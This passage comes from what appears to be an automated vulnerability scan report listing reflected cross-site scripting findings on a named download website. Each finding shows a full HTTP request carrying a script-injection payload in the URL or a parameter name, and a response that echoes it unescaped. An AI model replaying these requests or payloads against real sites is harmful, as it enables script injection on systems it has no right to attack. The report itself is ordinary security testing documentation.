<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-atom-downloads.html?e8505"><script>alert(1)</script>10d78ca816a=1" />
...[SNIP]...

4.1491. http://www.x64bitdownload.com/64-bit-audio-downloads.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-audio-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cb3a9"><script>alert(1)</script>d0002961a7e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-audio-downloads.htmlcb3a9"><script>alert(1)</script>d0002961a7e HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:46:08 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:56:54 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A5%3A%22audio%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A5%3A%22audio%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 96716


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-audio-downloads.htmlcb3a9"><script>alert(1)</script>d0002961a7e" />
...[SNIP]...

4.1492. http://www.x64bitdownload.com/64-bit-audio-downloads.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-audio-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c7c34"><script>alert(1)</script>baaa57e444b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-audio-downloads.html?c7c34"><script>alert(1)</script>baaa57e444b=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:41:25 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:51:38 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A5%3A%22audio%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A5%3A%22audio%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 96719


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-audio-downloads.html?c7c34"><script>alert(1)</script>baaa57e444b=1" />
...[SNIP]...

4.1493. http://www.x64bitdownload.com/64-bit-automatic-downloads.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-automatic-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ccfc"><script>alert(1)</script>7e29c8efc8f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-automatic-downloads.html5ccfc"><script>alert(1)</script>7e29c8efc8f HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:45:58 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:56:12 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A9%3A%22automatic%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A9%3A%22automatic%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 90259


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-automatic-downloads.html5ccfc"><script>alert(1)</script>7e29c8efc8f" />
...[SNIP]...

4.1494. http://www.x64bitdownload.com/64-bit-automatic-downloads.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-automatic-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 85109"><script>alert(1)</script>d22981fa63d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-automatic-downloads.html?85109"><script>alert(1)</script>d22981fa63d=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:43:43 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:53:48 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A9%3A%22automatic%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A9%3A%22automatic%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 90262


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-automatic-downloads.html?85109"><script>alert(1)</script>d22981fa63d=1" />
...[SNIP]...

4.1495. http://www.x64bitdownload.com/64-bit-autoposter-downloads.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-autoposter-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1ba5f"><script>alert(1)</script>cd53e677bcf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-autoposter-downloads.html1ba5f"><script>alert(1)</script>cd53e677bcf HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:42:56 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:53:06 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22autoposter%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22autoposter%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 36336


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-autoposter-downloads.html1ba5f"><script>alert(1)</script>cd53e677bcf" />
...[SNIP]...

4.1496. http://www.x64bitdownload.com/64-bit-autoposter-downloads.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-autoposter-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5be8e"><script>alert(1)</script>09953da3321 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-autoposter-downloads.html?5be8e"><script>alert(1)</script>09953da3321=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:38:26 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:48:26 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22autoposter%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22autoposter%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 36339


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-autoposter-downloads.html?5be8e"><script>alert(1)</script>09953da3321=1" />
...[SNIP]...

4.1497. http://www.x64bitdownload.com/64-bit-binaries-downloads.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-binaries-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a6728"><script>alert(1)</script>d227ac254cf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-binaries-downloads.htmla6728"><script>alert(1)</script>d227ac254cf HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:58:24 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:08:47 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A8%3A%22binaries%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A8%3A%22binaries%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 88897


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-binaries-downloads.htmla6728"><script>alert(1)</script>d227ac254cf" />
...[SNIP]...

4.1498. http://www.x64bitdownload.com/64-bit-binaries-downloads.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-binaries-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b928f"><script>alert(1)</script>b24ddd27216 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-binaries-downloads.html?b928f"><script>alert(1)</script>b24ddd27216=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:54:07 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:04:23 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A8%3A%22binaries%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A8%3A%22binaries%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 88900


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-binaries-downloads.html?b928f"><script>alert(1)</script>b24ddd27216=1" />
...[SNIP]...

4.1499. http://www.x64bitdownload.com/64-bit-binary-downloader-downloads.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-binary-downloader-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd625"><script>alert(1)</script>5e17d0ba98 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-binary-downloader-downloads.htmlfd625"><script>alert(1)</script>5e17d0ba98 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:58:23 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:08:43 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A17%3A%22binary-downloader%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A17%3A%22binary+downloader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 35790


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-binary-downloader-downloads.htmlfd625"><script>alert(1)</script>5e17d0ba98" />
...[SNIP]...

4.1500. http://www.x64bitdownload.com/64-bit-binary-downloader-downloads.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-binary-downloader-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f33c0"><script>alert(1)</script>a7faec4549f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-binary-downloader-downloads.html?f33c0"><script>alert(1)</script>a7faec4549f=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:55:05 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:05:37 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A17%3A%22binary-downloader%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A17%3A%22binary+downloader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 35794


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-binary-downloader-downloads.html?f33c0"><script>alert(1)</script>a7faec4549f=1" />
...[SNIP]...

4.1501. http://www.x64bitdownload.com/64-bit-binary-downloads.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-binary-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d254"><script>alert(1)</script>67bb66d1da1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-binary-downloads.html6d254"><script>alert(1)</script>67bb66d1da1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:42:25 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:52:48 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22binary%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22binary%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 91352


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-binary-downloads.html6d254"><script>alert(1)</script>67bb66d1da1" />
...[SNIP]...

4.1502. http://www.x64bitdownload.com/64-bit-binary-downloads.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-binary-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a5d5c"><script>alert(1)</script>01d31414795 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-binary-downloads.html?a5d5c"><script>alert(1)</script>01d31414795=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:38:50 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:48:59 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22binary%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22binary%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 91355


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-binary-downloads.html?a5d5c"><script>alert(1)</script>01d31414795=1" />
...[SNIP]...

4.1503. http://www.x64bitdownload.com/64-bit-board-downloads.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-board-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3c7db"><script>alert(1)</script>387ba0d9d20 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-board-downloads.html3c7db"><script>alert(1)</script>387ba0d9d20 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:00:44 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:10:58 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A5%3A%22board%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A5%3A%22board%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 88268


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-board-downloads.html3c7db"><script>alert(1)</script>387ba0d9d20" />
...[SNIP]...

4.1504. http://www.x64bitdownload.com/64-bit-board-downloads.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-board-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 123df"><script>alert(1)</script>9a9ef9bad1b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-board-downloads.html?123df"><script>alert(1)</script>9a9ef9bad1b=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:57:05 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:07:19 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A5%3A%22board%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A5%3A%22board%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 88271


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-board-downloads.html?123df"><script>alert(1)</script>9a9ef9bad1b=1" />
...[SNIP]...

4.1505. http://www.x64bitdownload.com/64-bit-boards-downloads.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-boards-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1044f"><script>alert(1)</script>58b87c63170 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-boards-downloads.html?1044f"><script>alert(1)</script>58b87c63170=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:57:26 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:07:44 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22boards%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22boards%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 86957


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-boards-downloads.html?1044f"><script>alert(1)</script>58b87c63170=1" />
...[SNIP]...

4.1506. http://www.x64bitdownload.com/64-bit-client-downloads.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-client-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 107a5"><script>alert(1)</script>5d3bbdbca7a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

